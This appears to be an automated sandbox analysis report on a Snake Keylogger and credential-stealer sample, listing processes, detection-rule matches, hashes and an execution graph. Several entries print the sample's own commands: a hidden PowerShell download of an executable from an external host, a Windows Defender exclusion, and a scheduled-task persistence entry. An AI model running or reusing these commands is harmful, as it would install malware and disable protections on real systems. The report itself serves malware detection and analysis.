                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low

                                    Target ID:9
                                    Start time:13:42:30
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
                                    Imagebase:0x13f100000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937588508.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000009.00000002.937344564.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    Reputation:high

                                    Target ID:11
                                    Start time:13:42:37
                                    Start date:23/08/2022
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
                                    Imagebase:0x21c40000
                                    File size:452608 bytes
                                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    Target ID:13
                                    Start time:13:42:38
                                    Start date:23/08/2022
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpEFF.tmp
                                    Imagebase:0x610000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:15
                                    Start time:13:42:41
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low

                                    Target ID:16
                                    Start time:13:42:41
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x4acb0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:18
                                    Start time:13:42:42
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://f0705964.xsph.ru/mum.exe','C:\Users\user\AppData\Roaming\mum.exe')
                                    Imagebase:0x13f3a0000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.962416931.000000000026E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.964450317.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                    • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                    Target ID:19
                                    Start time:13:42:42
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:21
                                    Start time:13:42:51
                                    Start date:23/08/2022
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
                                    Imagebase:0x21cf0000
                                    File size:452608 bytes
                                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:23
                                    Start time:13:42:51
                                    Start date:23/08/2022
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmp430A.tmp
                                    Imagebase:0xe30000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:25
                                    Start time:13:42:55
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:26
                                    Start time:13:42:56
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:27
                                    Start time:13:43:10
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x4acb0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:29
                                    Start time:13:43:10
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:30
                                    Start time:13:43:16
                                    Start date:23/08/2022
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe
                                    Imagebase:0x21b20000
                                    File size:452608 bytes
                                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:32
                                    Start time:13:43:17
                                    Start date:23/08/2022
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RRUwFfPTEDHYrl" /XML "C:\Users\user\AppData\Local\Temp\tmpA5B2.tmp
                                    Imagebase:0xa20000
                                    File size:179712 bytes
                                    MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:34
                                    Start time:13:43:20
                                    Start date:23/08/2022
                                    Path:C:\Users\user\AppData\Roaming\mum.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\mum.exe
                                    Imagebase:0x11b0000
                                    File size:829952 bytes
                                    MD5 hash:06C16E9A1807F8754D73C6B77E978D02
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET

                                    Target ID:35
                                    Start time:13:43:29
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\verclsid.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                    Imagebase:0xff6c0000
                                    File size:11776 bytes
                                    MD5 hash:3796AE13F680D9239210513EDA590E86
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:36
                                    Start time:13:43:31
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\notepad.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT
                                    Imagebase:0xff3c0000
                                    File size:193536 bytes
                                    MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:37
                                    Start time:13:44:46
                                    Start date:23/08/2022
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                    Imagebase:0xff7d0000
                                    File size:27136 bytes
                                    MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.923527344.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff00280000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
                                      • Instruction ID: 7124490244aa5ef4451e390dd16296ae8c3d111d94112d62d7462eb385d4d442
                                      • Opcode Fuzzy Hash: 8186a9d334dd9cb0feefb8e737fcd35b43cc78e7094219c694a074c5487a30bf
                                      • Instruction Fuzzy Hash: 30E0D811B29C0B0FFBD0666C684A7B573C0E754313F500076E80CC26E7DD29F9454381
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:13.3%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:26
                                      Total number of Limit Nodes:0
                                      execution_graph 10401 48b6e48 10402 48b6e94 WriteProcessMemory 10401->10402 10404 48b6f33 10402->10404 10418 48b6fd8 10419 48b7024 ReadProcessMemory 10418->10419 10421 48b70a2 10419->10421 10422 48b69e0 10423 48b6a24 ResumeThread 10422->10423 10425 48b6a76 10423->10425 10426 48b7270 10427 48b72f7 CreateProcessA 10426->10427 10429 48b7555 10427->10429 10405 54c93c0 10406 54c93d5 10405->10406 10410 48b6af9 10406->10410 10414 48b6b00 10406->10414 10407 54c93eb 10411 48b6b49 Wow64SetThreadContext 10410->10411 10413 48b6bc7 10411->10413 10413->10407 10415 48b6b49 Wow64SetThreadContext 10414->10415 10417 48b6bc7 10415->10417 10417->10407 10430 54c9330 10431 54c9345 10430->10431 10434 48b6cf0 10431->10434 10435 48b6d34 VirtualAllocEx 10434->10435 10437 48b6db2 10435->10437

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 270 240911-240ad2 293 240ad4-240b0a 270->293 294 240b0c-240b0e 270->294 293->294 295 240b14-240b1e 294->295 296 240b10-240b12 294->296 297 240b20-240b36 295->297 296->297 300 240b3c-240b44 297->300 301 240b38-240b3a 297->301 302 240b46-240b4b 300->302 301->302 305 240b65-240b8e 302->305 306 240b4d-240b60 302->306 309 240b90-240b9c 305->309 310 240bc9-240bd3 305->310 306->305 309->310 311 240b9e-240bab 309->311 312 240bd5 310->312 313 240bdc-240c66 310->313 316 240bb1-240bc4 311->316 317 240bad-240baf 311->317 312->313 323 240c68-240ca8 313->323 324 240caa-240cb8 313->324 316->310 317->310 327 240cc3-240d10 323->327 324->327 343 240d13 call 241990 327->343 344 240d13 call 241a31 327->344 345 240d13 call 24198e 327->345 331 240d19-240d98 346 240d9e call 2422a0 331->346 347 240d9e call 2422b0 331->347 335 240da4-240da6 336 240dd4-240df0 335->336 337 240da8-240dc4 335->337 339 240df2 336->339 340 240dfe 336->340 342 240dd0-240dd2 337->342 339->340 342->336 342->337 343->331 344->331 345->331 346->335 347->335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl$48l
                                      • API String ID: 0-2888918871
                                      • Opcode ID: df6d5da292d224cba89dc474667beb86a17370b5070ffb87084a5dff0a632f96
                                      • Instruction ID: 655d6d859742e452b1eb3feb29640871d53d6d983427bf532653f64b62ef41b1
                                      • Opcode Fuzzy Hash: df6d5da292d224cba89dc474667beb86a17370b5070ffb87084a5dff0a632f96
                                      • Instruction Fuzzy Hash: A1E18A35A10229CFDB14DF79D884AAEB7B2BFC9305B11C629E405EB764DB30A9458F90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 348 241ca2-241ce0 353 241cf1-241cf8 call 2418b0 348->353 354 241ce2-241cf0 348->354 357 241d09-241d23 353->357 358 241cfa-241d08 353->358 360 241e0e-241e81 call 244638 357->360 361 241d29-241d36 357->361 385 241e83 call 241ef0 360->385 386 241e83 call 241ee1 360->386 361->360 362 241d3c-241d46 361->362 362->360 364 241d4c-241d56 362->364 364->360 366 241d5c-241d76 364->366 368 241d79-241d97 366->368 368->360 369 241d99-241dbe 368->369 369->360 371 241dc0-241dd2 369->371 371->368 372 241dd4-241dd6 371->372 374 241dd9-241dde 372->374 374->360 375 241de0-241dea 374->375 375->374 377 241dec-241e0d 375->377 383 241e89-241e96 385->383 386->383
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.*=
                                      • API String ID: 0-954985398
                                      • Opcode ID: 5091a5fef49f5a38f7d7a7851545266683813687feb8e29c48d72e691dfe27c5
                                      • Instruction ID: fc6c56b410a5d3cd194bfedd1d28c42e3da708af7889b043dd5969875d99d80f
                                      • Opcode Fuzzy Hash: 5091a5fef49f5a38f7d7a7851545266683813687feb8e29c48d72e691dfe27c5
                                      • Instruction Fuzzy Hash: 9151EF75B101158FCB18DF68D8805AEBBB2EFC93157158176E909CB755EB30ECA58B80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tl
                                      • API String ID: 0-379094156
                                      • Opcode ID: 9bca0fc51fff3c85174ca48fa103819c23800f43ef89d08716105dbe66ece087
                                      • Instruction ID: 287dbb3999b2bf023d9edc8b5010dffadb70fc28a9dea589a05a86e9a1ffbfd9
                                      • Opcode Fuzzy Hash: 9bca0fc51fff3c85174ca48fa103819c23800f43ef89d08716105dbe66ece087
                                      • Instruction Fuzzy Hash: 85818C32F205259FD714DB69D880AAEB3E3AFC8754F1A8065E809DB765DB30EC51CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: 1cddb941f64a5a2227e57ce3c2d22be6d7795e709496d9f6ea0b0cf71e0cb264
                                      • Instruction ID: 0647bf1b319c492b9064875e5850212f38ed884f3038c6f2997cccdbe86fbf18
                                      • Opcode Fuzzy Hash: 1cddb941f64a5a2227e57ce3c2d22be6d7795e709496d9f6ea0b0cf71e0cb264
                                      • Instruction Fuzzy Hash: 1A7119B8D5020EDFDF14CFA9D4859ADBBB1BF88310F10A659D412EB290DB31A991CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d290ae60caacb0ea45fb8dc1b8f26b713186b02f70a04039c46dbb75a78b9bcc
                                      • Instruction ID: 9222c6df91e20a8d17064fe9a375fe360ea9ae4eedfb0988e5fe4e3972f2503a
                                      • Opcode Fuzzy Hash: d290ae60caacb0ea45fb8dc1b8f26b713186b02f70a04039c46dbb75a78b9bcc
                                      • Instruction Fuzzy Hash: 27616B32F205259FD714DB69CC80BAEB3A3AFC8714F2A8065E8199B765DA34DC51CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_48b0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5ce8027ccb235f93ce94a24625ad72d8d6b6826469e201592d12dda760bdb0b
                                      • Instruction ID: ad2c6b2e81927779860f58f081e09bf472c54a88b80398a5bca54947ef142871
                                      • Opcode Fuzzy Hash: a5ce8027ccb235f93ce94a24625ad72d8d6b6826469e201592d12dda760bdb0b
                                      • Instruction Fuzzy Hash: 39512C70E1910CCFCB04EFA5D4405EDBBBAAF89314F14A926D056F7314EB30A8459F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ad0acd54d6b28decf9e2a0dadfa0308d992bc311cbed9cf1370ade281a808d82
                                      • Instruction ID: 4f2510d2e94c406889ade92c99c2b517751fa693eb4a97368b926161fc809cca
                                      • Opcode Fuzzy Hash: ad0acd54d6b28decf9e2a0dadfa0308d992bc311cbed9cf1370ade281a808d82
                                      • Instruction Fuzzy Hash: 0D21A971E156489BDB19CFABC80059EFBF7AFC9300F18C07A9418AB269DB705A06CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 240114-242e5d call 2407f8 * 10 110 242e62 call 242f60 0->110 111 242e62 call 243100 0->111 88 242e68-242f58 call 2407f8 * 2 110->88 111->88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: b29960cb41e26b99b88da02fec13fdd71bc9c295965162f797b5b6909ef9e9b2
                                      • Instruction ID: aa489a60462d5d7549b46f28e0aab031a1892f91ac7359a9cc9143c155458b6c
                                      • Opcode Fuzzy Hash: b29960cb41e26b99b88da02fec13fdd71bc9c295965162f797b5b6909ef9e9b2
                                      • Instruction Fuzzy Hash: F5023F34610604CFCB58EF78C495A9DB7A6AF89304F1184BCD90A9F369DF39AC45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 112 242941-2429f1 129 2429f8-242a1a 112->129 130 242a21-242e52 call 2407f8 * 10 129->130 198 242e58-242e5d 130->198 221 242e62 call 242f60 198->221 222 242e62 call 243100 198->222 199 242e68-242e95 202 242e9c-242ea6 199->202 203 242eac-242f43 call 2407f8 * 2 202->203 219 242f48-242f4a 203->219 220 242f51-242f58 219->220 221->199 222->199
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +$+$=
                                      • API String ID: 0-3271284183
                                      • Opcode ID: 13d43b78c93e2870e81bcf33c971adeaa7937e3544e0dc4627a617b7ce6ce317
                                      • Instruction ID: 3103dcd057988e5d95579713c19d24554412017e9d47b3c9d4140706cc031ae5
                                      • Opcode Fuzzy Hash: 13d43b78c93e2870e81bcf33c971adeaa7937e3544e0dc4627a617b7ce6ce317
                                      • Instruction Fuzzy Hash: 27024D34610604CFCB58EF78C495A9EB7A6AF89304F1184BCD90A9F369DF39AC45CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 223 246e30-246e5e 224 246e94-246ec3 223->224 227 247085-247091 224->227 228 246ec9-246ed5 224->228 233 2470b7-2470ba 227->233 234 247093-247096 227->234 229 246e60-246e63 228->229 230 246e65 229->230 231 246e6c-246e80 229->231 230->224 230->231 235 246f65-246f6e 230->235 236 247066-24706b 230->236 237 247002-24700c 230->237 238 247043-247047 230->238 239 247029-24703e 230->239 240 246fb7-246fbb 230->240 241 246ed7-246ede 230->241 242 247070-247084 230->242 243 24701f-247024 230->243 244 246fdf-246feb 230->244 245 246f19-246f1f 230->245 246 246ef9-246efd 230->246 247 24705a-24705e 230->247 231->227 264 246e86-246e92 231->264 234->233 235->227 250 246f74-246fa3 call 246008 235->250 236->229 237->227 254 24700e-24701a 237->254 256 247053-247058 238->256 257 247049 238->257 239->229 251 246fbd-246fc4 240->251 252 246fd8-246fdd 240->252 241->227 248 246ee4-246ef4 241->248 243->229 244->227 253 246ff1-246ffd 244->253 245->227 249 246f25-246f40 245->249 259 246f07-246f14 246->259 247->236 248->229 249->227 267 246f46-246f51 249->267 250->227 268 246fa9-246fb2 250->268 251->227 262 246fca-246fce 251->262 252->244 261 246fd3 252->261 253->229 254->229 256->247 263 24704e 256->263 257->263 259->229 261->229 262->261 263->229 264->229 267->227 269 246f57-246f60 267->269 268->229 269->229
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ,/l$`!l$`!l
                                      • API String ID: 0-3429197752
                                      • Opcode ID: 87dfd168de92a39b8ddedf9cace7f65fa9fa0dacd292453730edd25eadbdc962
                                      • Instruction ID: 5be2918ce5b58780560fb2ccf16a45c7bebcdd6546d2aac17efc0748785786e9
                                      • Opcode Fuzzy Hash: 87dfd168de92a39b8ddedf9cace7f65fa9fa0dacd292453730edd25eadbdc962
                                      • Instruction Fuzzy Hash: AA61BF70A29619CFC708CF64C544ABEF7F2EF45700F548516E066AB292C774EC90CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 387 242f60-242f6d 388 242f6f-242f7f 387->388 389 242f89-24306d call 2407f8 * 2 387->389 388->389 410 243077-2430a2 389->410 413 2430a4-2430aa 410->413 414 2430ba-2430f4 call 2407f8 410->414 415 2430ac 413->415 416 2430ae-2430b0 413->416 415->414 416->414
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_240000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `!l$`!l
                                      • API String ID: 0-3986300676
                                      • Opcode ID: 12d52d4301c761bd9225f86e0827e293379b8d1af6b519651d0362d4eb7a64b2
